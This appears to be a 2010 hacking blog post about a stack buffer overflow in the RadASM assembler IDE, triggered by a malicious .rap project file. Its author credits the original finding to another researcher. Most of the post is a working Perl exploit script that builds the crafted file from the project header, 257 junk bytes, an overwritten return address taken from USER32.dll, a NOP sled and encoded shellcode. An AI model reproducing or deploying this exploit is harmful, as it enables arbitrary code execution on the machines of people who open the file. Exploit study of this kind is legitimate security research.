Pages

Thursday, February 11, 2010

Radasm .rap Stack buffer overflow !

Hey guys ,
While i was checking  for new vulnerabilities , i found this exploit in a program named (Radasm ) which suffers of a buffer overflow when executing a malicious .rap file with the right header and the right end-header - as i name it - .
Here is the original exploit ::> http://www.exploit-db.com/exploits/11400 ( It's not discovered by me , it's discovered by Dz_attacker, so all rights are reserved to him ! )
Just a small fuzzing stuff , i noticed that the header was ::>
[Project]
Assembler=masm
Group=1
GroupExpand=1
[Files]
1=AVP [JUNK-STUFF AREA]
And the end-header was ::>
2=AVP Over.Inc
[MakeFiles]
0=AVP Over.res
[MakeDef]
Menu=0,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0
1=4,O,$B\RC.EXE /v,1
2=3,O,$B\ML.EXE /c /coff /Cp /no6Cogo /I"$I",2
3=5,O,$B\LINK.EXE /SUBSYSTEM:WINDOWS /RELEASE /VERSION:4.0 /LIBPATH:"$L" /OUT:"$5",3
4=0,0,,5
5=rsrc.obj,O,$B\CVTRES.EXE,rsrc.res
6=*.obj,O,$B\ML.EXE /c /coff /Cp /nologo /I"$I",*.asm
7=0,0,"$E\OllyDbg",5
[Group]
Group=Added files,Assembly,Resources,Misc,Modules
1=1
Well , i tried to just copy/paste the header and the end-header to my codes and put the shellcode in the middle , and the same happened ( PWNED!)
But Dz_attacker made the right thing by transforming the header and the end-header to hex-bytes characters, because if anyone just tried to copy/paste it like me , he must makes some important stuff ( like putting before every " a backslash to be like so \"  , also before every backslash to be like so \\ )
That was boring & long but interesting ( at least for me :P ) !
And here is my vulnerability script written in perl ::>
#!/usr/bin/perl -w
my $file="Crash.rap";
my $header="[Project]\nAssembler=masm\nGroup=1\nGroupExpand=1\n[Files]\n1=AVP ";
my $end="\n2=AVP Over.Inc\n[MakeFiles]\n0=AVP Over.res\n[MakeDef]\nMenu=0,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0\n1=4,O,$B\\RC.EXE /v,1\n2=3,O,$B\\ML.EXE /c /coff /Cp /no6Cogo /I\"$I\",2\n3=5,O,$B\\LINK.EXE /SUBSYSTEM:WINDOWS /RELEASE /VERSION:4.0 /LIBPATH:\"$L\" /OUT:\"$5\",3\n4=0,0,,5\n5=rsrc.obj,O,$B\CVTRES.EXE,rsrc.res\n6=*.obj,O,$B\\ML.EXE /c /coff /Cp /nologo /I\"$I\",*.asm\n7=0,0,\"$E\\OllyDbg\",5\n[Group]\nGroup=Added files,Assembly,Resources,Misc,Modules\n1=1";
my $junk="A"x257;
my $eip=pack('V',0x7E4456F7); #7E4456F7 from USER32.dll <<<<< !!!
my $presc="SEXYSEXYSEXY";
my $esp="\x90"x20;
$esp=$esp."\xd9\xc5\xd9\x74\x24\xf4\x5f\x31\xc9\xb1\x11\xba\x83\x9b" .
"\x0c\x12\x31\x57\x18\x03\x57\x18\x83\xc7\x87\x79\xf9\x7a" .
"\xc3\x5d\x22\x7b\xa3\xcd\x75\x35\x76\x86\x14\xe9\x55\x76" .
"\x8f\xc9\xf1\x13\x2e\x62\x8b\xb2\xc4\x0b\x03\x16\x40\x8f" .
"\xa6\xf0\xe6\x2e\x26\x21\x9f\xf3\xd9\x53\x3a\x7d\xc3\xa5" .
"\x1f\x2e\x5d\x90\xcc\x6a\x8d\x1b\xb6\xf2\xb2\xf7\x09\xd0" .
"\x1f\x43\x7b\x2d\x1e\xcf\x83\x62";
open(INI,">$file");
print INI $header.$junk.$eip.$presc.$esp.$end;
close(INI);

And here is the result ::>

No comments:

Post a Comment